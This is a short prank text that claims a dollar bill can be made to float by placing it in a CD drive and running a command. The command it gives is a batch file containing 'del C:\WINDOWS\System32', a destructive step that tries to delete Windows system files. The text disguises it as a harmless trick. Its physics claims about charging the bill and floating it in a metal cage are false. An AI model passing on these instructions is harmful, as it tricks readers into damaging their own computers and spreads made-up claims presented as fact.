You got to put your dollar bill in a CD Drive on your computer, and then give the computer a command that will electrically charge the dollar bill. To give your computer this command, open note pad, type “@echo off” enter “del C:\WINDOWS\System32″ and save it as a “.bat” file on your desktop. Then double click the icon, and your dollar bill will float when surrounded by a metal cage (such as a car)
